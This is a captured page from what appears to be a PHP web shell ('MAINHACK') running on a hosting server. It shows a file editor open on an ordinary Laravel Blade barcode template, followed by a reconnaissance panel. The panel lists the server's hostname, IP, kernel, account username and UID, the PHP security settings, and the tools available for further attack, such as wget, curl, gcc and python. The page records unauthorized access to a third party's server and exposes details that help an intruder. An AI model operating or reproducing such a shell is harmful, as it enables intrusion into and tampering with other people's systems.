[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.blade.php
@extends('layouts.app') @section('title', __('barcode.barcodes')) @section('content') <!-- Content Header (Page header) --> <section class="content-header"> <h1 class="tw-text-xl md:tw-text-3xl tw-font-bold tw-text-black">@lang('barcode.barcodes') <small class="tw-text-sm md:tw-text-base tw-text-gray-700 tw-font-semibold">@lang('barcode.manage_your_barcodes')</small> </h1> <!-- <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Level</a></li> <li class="active">Here</li> </ol> --> </section> <!-- Main content --> <section class="content"> <div class="box"> <div class="box-header"> <h3 class="box-title">@lang('barcode.all_your_barcode')</h3> <div class="box-tools"> <a class="btn btn-block btn-primary" href="{{action([\App\Http\Controllers\BarcodeController::class, 'create'])}}"> <i class="fa fa-plus"></i> @lang('barcode.add_new_setting')</a> </div> </div> <div class="box-body"> <table class="table table-bordered table-striped" id="barcode_table"> <thead> <tr> <th>@lang('barcode.setting_name')</th> <th>@lang('barcode.setting_description')</th> <th>Action</th> </tr> </thead> </table> </div> </div> </section> <!-- /.content --> @stop @section('javascript') <script type="text/javascript"> $(document).ready( function(){ var barcode_table = $('#barcode_table').DataTable({ processing: true, serverSide: true, fixedHeader:false, buttons:[], ajax: '/barcodes', bPaginate: false, columnDefs: [ { "targets": 2, "orderable": false, "searchable": false } ] }); $(document).on('click', 'button.delete_barcode_button', function(){ var is_confirmed = confirm("{{ __('barcode.delete_confirm') }}"); if(!is_confirmed){ return; } var href = $(this).data('href'); var data = $(this).serialize(); $.ajax({ method: "DELETE", url: href, dataType: "json", data: data, success: function(result){ if(result.success === true){ toastr.success(result.msg); barcode_table.ajax.reload(); } else { toastr.error(result.msg); } } }); }); $(document).on('click', 'button.set_default', function(){ var href = $(this).data('href'); var data = $(this).serialize(); $.ajax({ method: "get", url: href, dataType: "json", data: data, success: function(result){ if(result.success === true){ toastr.success(result.msg); barcode_table.ajax.reload(); } else { toastr.error(result.msg); } } }); }); }); </script> @endsection
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.86 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285